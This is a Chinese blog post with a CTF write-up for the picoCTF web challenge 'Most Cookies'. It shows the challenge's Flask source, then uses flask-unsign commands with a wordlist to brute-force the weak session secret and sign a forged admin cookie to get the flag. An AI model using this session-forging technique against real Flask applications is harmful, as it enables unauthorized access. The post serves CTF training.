picoCTF-Web Exploitation-Most Cookies

最新推荐文章于 2024-05-25 20:32:51 发布
最新推荐文章于 2024-05-25 20:32:51 发布
阅读量357 收藏 3
点赞数 5
分类专栏: CTF 文章标签: python flask 密码学 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/huckers/article/details/138714219
版权

Description

Alright, enough of using my own encryption. Flask session cookies
should be plenty secure!
server.py
http://mercury.picoctf.net:53700/

Hints

How secure is a flask cookie?

我们先下载server.py,分析逻辑

from flask import Flask, render_template, request, url_for, redirect, make_response, flash, session
import random
app = Flask(__name__)
flag_value = open("./flag").read().rstrip()
title = "Most Cookies"
cookie_names = ["snickerdoodle", "chocolate chip", "oatmeal raisin", "gingersnap", "shortbread", "peanut butter", "whoopie pie", "sugar", "molasses", "kiss", "biscotti", "butter", "spritz", "snowball", "drop", "thumbprint", "pinwheel", "wafer", "macaroon", "fortune", "crinkle", "icebox", "gingerbread", "tassie", "lebkuchen", "macaron", "black and white", "white chocolate macadamia"]
app.secret_key = random.choice(cookie_names)

@app.route("/")
def main():
	if session.get("very_auth"):
		check = session["very_auth"]
		if check == "blank":
			return render_template("index.html", title=title)
		else:
			return make_response(redirect("/display"))
	else:
		resp = make_response(redirect("/"))
		session["very_auth"] = "blank"
		return resp

@app.route("/search", methods=["GET", "POST"])
def search():
	if "name" in request.form and request.form["name"] in cookie_names:
		resp = make_response(redirect("/display"))
		session["very_auth"] = request.form["name"]
		return resp
	else:
		message = "That doesn't appear to be a valid cookie."
		category = "danger"
		flash(message, category)
		resp = make_response(redirect("/"))
		session["very_auth"] = "blank"
		return resp

@app.route("/reset")
def reset():
	resp = make_response(redirect("/"))
	session.pop("very_auth", None)
	return resp

@app.route("/display", methods=["GET"])
def flag():
	if session.get("very_auth"):
		check = session["very_auth"]
		if check == "admin":
			resp = make_response(render_template("flag.html", value=flag_value, title=title))
			return resp
		flash("That is a cookie! Not very special though...", "success")
		return render_template("not-flag.html", title=title, cookie_name=session["very_auth"])
	else:
		resp = make_response(redirect("/"))
		session["very_auth"] = "blank"
		return resp

if __name__ == "__main__":
	app.run()

这里的逻辑表示,本站使用Python的Flask框架

  1. secret_keycookie_names 中随机选取
cookie_names = ["snickerdoodle", "chocolate chip", "oatmeal raisin", "gingersnap", "shortbread", "peanut butter", "whoopie pie", "sugar", "molasses", "kiss", "biscotti", "butter", "spritz", "snowball", "drop", "thumbprint", "pinwheel", "wafer", "macaroon", "fortune", "crinkle", "icebox", "gingerbread", "tassie", "lebkuchen", "macaron", "black and white", "white chocolate macadamia"]
  1. 要渲染flag.html页面展示flag_value,需要访问路由/display
  2. 要访问/display需要session中满足very_auth=admin
  3. 默认very_auth=blank

那么我们的步骤应该是这样:

访问网站拿到session

eyJ2ZXJ5X2F1dGgiOiJibGFuayJ9.Zj5SAw.yDhJBck0rG1vky-AxS4GxUhG-qw

这是JWT格式,去JWT官网解析得到

HEADER:{
  "very_auth": "blank"
}

下一步就是要将very_auth改为admin ,该网站上要指出的另一件事是有一个“验签”部分。由于Flask Cookie 涉及加密,因此设置了一个secret_key来防止攻击者。那么我们接下来就要找到这个secret_key 范围就在cookie_names

安装flask-unsign(我是windows,cmd环境,请注意引号相关)

C:\Users\HUCKER>py -m pip install flask-unsign

使用flask-unsign及cookie_names转换的wordlist解签找到secret_key 得到结果peanut butter

C:\Users\HUCKER>flask-unsign --unsign --server http://mercury.picoctf.net:53700/ --wordlist wordlist.txt
[*] Server returned HTTP 302 (FOUND)
[+] Successfully obtained session cookie: eyJ2ZXJ5X2F1dGgiOiJibGFuayJ9.Zj8ERw.nHxSKV9M89MrPwFqeNAQnPG7qiM
[*] Session decodes to: {'very_auth': 'blank'}
[*] Starting brute-forcer with 8 threads..
[+] Found secret key after 28 attemptscadamia
'peanut butter'

使用flask-unsign对{'very_auth': 'admin'} 进行签名,使用我们解密出的secret

C:\Users\HUCKER>flask-unsign --sign --cookie "{'very_auth': 'admin'}" --secret "peanut butter"
eyJ2ZXJ5X2F1dGgiOiJhZG1pbiJ9.Zj8LNg.pxdjkKcibAI5RG9OdMcWVkUsFXo

将得到签名后的token替换到网页cookie→session中,刷新页面得到flag
在这里插入图片描述

wordlist.txt(放到cmd运行目录即可,我的是C:\Users\HUCKER

snickerdoodle
chocolate chip
oatmeal raisin
gingersnap
shortbread
peanut butter
whoopie pie
sugar
molasses
kiss
biscotti
butter
spritz
snowball
drop
thumbprint
pinwheel
wafer
macaroon
fortune
crinkle
icebox
gingerbread
tassie
lebkuchen
macaron
black and white
white chocolate macadamia
huckers
关注
  • 5
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
android-kernel-exploitation:Android内核开发
03-19
Android内核开发 客观的 本次研讨会的目的是开始在Android平台上进行内核...git clone https://github.com/cloudfuzz/android-kernel-exploitation ~ /workshop Github页面URL 车间流 作者 阿什法克安萨里( 的) 。
picoCTF-Web Exploitation-More SQLi
huckers的博客
05-12 360
先随便输入个账号密码登录一下,得到查询SQL,接下来应该对SQL进行某些攻击来绕过密码登录成功。password 条件在 username 前,我们只能先搞定password了。表,用来存储数据库表的一些信息,我们构建一个sql,用来展示都有哪些表及字段。中有个flag字段,我们构建一个sql来查询,得到flag。提示使用的SQLite数据库,在 SQLite 中有个。填入信息search一下发现这里大概的sql语句为。建如下sql,试一下。
PicoCTF——Most Cookie思路讲解
npu2022303155的博客
04-25 787
1. 并没有手把手的步骤,只有一些经验。 2. 会有一些抓包图片来帮助理解,只是不知道有没有多此一举。
picoCTF-Web Exploitation-Web Gauntlet
huckers的博客
05-12 475
按照提示,需要用admin登录,查看filter.php,这应该是一个SQL注入题,提示我们可以使用无痕浏览器来以便cookie可以不用每次清除。中展示了sql过滤逻辑,可以回味一下,尝试用不同的关键字来注入。提示sql过滤or,我们使用。
picoCTF-Web Exploitation-Trickster
huckers的博客
05-12 442
连接木马地址,以前用菜刀,管理webshell,爬取网站文件信息挺好用的,百度找到一个中国蚁剑就决定试试,看介绍好像也是根据菜刀改的。这应该是个上传漏洞了,十几年没用过了,不知道思路是不是一样的,以前的思路是通过上传漏洞想办法上传一个木马,拿到webshell,今天试试看能不能成功。随便制作一个png图片(直接截图保存),越小越好,便于我们查看修改文件信息,上传png图片。,(这里后缀的验证是前端js做的,用Burpsuite发送请求就不必考虑后缀的验证问题了)扩展名,然后还要验证文件字节的正确性。
picoCTF-Web Exploitation-Java Code Analysis!?!
huckers的博客
05-13 992
code?
vmware-exploitation:与VMware转义漏洞相关的链接的集合
05-12
VMware开发与VMware转义漏洞相关的链接的集合。 拉请求是受欢迎的。研究2020年 [文章] [幻灯片] [文章] 撰写的 [文章]2019年“ ESXi的大逃亡”(36C3)[] [ ] 撰写的 [文章] 撰写的 [文章] [纸] 2018年Zisis ...
heap-exploitation.pdf
02-01
heap-exploitation.pdf
Windows-10-Exploitation
03-21
Windows-10-Exploitation
Nosql-Exploitation-Framework:用于NoSQL扫描和利用的Python框架
02-03
Nosql开发框架NoSQL扫描和利用框架的框架NoSQL开发框架2.02b发布作者弗朗西斯·亚历山大(Francis Alexander)创建的NoSQL开发框架维基NoSQL Exploitation Framework Wiki的安装和用法-https: 特征: 第一个工具,...
【hackmyvm】Slowman靶机
woshicainiao666的博客
05-20 1422
发现/secretLOGIN/login.html为登录地址,根据账号密码登录发现一个zip,但是需要密码。在FTP中得到的账号,爆破一下SSH。上传linpeas.sh文件,报一下。SSH爆破无果,试试mysql。得到用户名和加密的密码。
python中用“*”运算符复制列表时子列表实际上引用的是同一个列表,列表和嵌套列表的坑
ThreeS_tones的博客
05-21 739
当你修改了一个子列表的元素时,所有的子列表都会随之改变。因为他们实际上都是同一个子列表的引用。输出如下,可以看到每个子列表中的第5个元素相同,并没有实现从0.8-1.2分布。先看一个例子,我想改变load的子列表中第五个元素,从0.8-1.2分布。的时候,Python实际上。
Python编程从入门到实践》day36
m0_37565294的博客
05-22 1244
我们要编写一个名为“学习笔记”的Web应用程序,让用户能够记录感兴趣的主题,并在学习每个主题的过程中添加日志条目。django-admin startproject learning_log . # 新建一个名为learning_log的项目,末尾的句点让新项目使用合适的目录结构。运行命令ls,其输出表明Django有创建一个db.sqlite3.SQLite使用一种使用单个文件的数据库。# 包含4个文件(settings.py、urls.py、wsgi.py、__init__.py)
python梯度下降法求解三元线性回归系数,并绘制结果
最新发布
2401_82997545的博客
05-25 396
theta = np.random.randn(4, 1) # 初始化参数。n_iterations = 1000 # 迭代次数。print("得到的参数为:", theta)# 梯度下降求解多元线性回归系数。eta = 0.1 # 学习率。m = 100 # 样本数。
python 异常处理 try
qq_64993426的博客
05-24 608
异常处理,主动抛出异常,断言
JVM学习-执行引擎
丢爸
05-21 1036
当然是否需要启动JIT编译器将字节码直接编译为对应平台的本地机器指令,则需要根据代码被调用。大部分的程序代码转换为物理机的目标代码或虚拟机能执行的指令集之前,都需要经过下图各个步骤。,将其直接编译为对应平台的本地机器指令,以此提升Java程序的执行性能。”,JIT编译器在运行时会针对那些频繁被调用的热点代码做出。Java代码编译是由Java源码编译器来完成,流程图如下。而定,关于那些需要被编译为本地代码的字节码,称为“Java字节码的执行是由JVM执行引擎来完成。
python数据分析numpy基础之intersect1d求数组交集
sinat_34735632的博客
05-19 979
python的numpy库的intersect1d(x,y)函数,计算x和y的公共元素,并返回去重后的有序结果。相当于求两个数组中的交集,并且进行去重和排序。numpy.intersect1()查找两个数组的公共元素,并且返回去重后的有序结果。ar1,ar2:必选,列表、元组、数组;如果是多维则自动转一维数组;assume_unique:可选,bool,默认False,若为True则可以加快计算素材,此时ar1和ar2需为元素唯一的数组,否则结果不会去重;
提取COCO 数据集的部分类
qq_53682472的博客
05-24 469
若报错,pip install git+https://github.com/philferriere/cocoapi.git#subdirectory=PythonAPI。注意skimage用pip install scikit-image -i https://pypi.tuna.tsinghua.edu.cn/simple。安装pycocotools github地址:https://github.com/philferriere/cocoapi。实在不行的话,手动下载。
nmap --scrip
05-20
nmap --script is a command used in the Nmap tool to launch NSE (Nmap Scripting Engine) scripts. NSE scripts are used for a variety of purposes such as vulnerability detection, network inventory, and exploitation. The --script option allows users to specify which scripts they want to run. For example, to run all scripts related to SMB (Server Message Block), the command would be: ``` nmap -p 445 --script smb* ``` This would scan all hosts on port 445 and run all scripts that start with "smb".

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值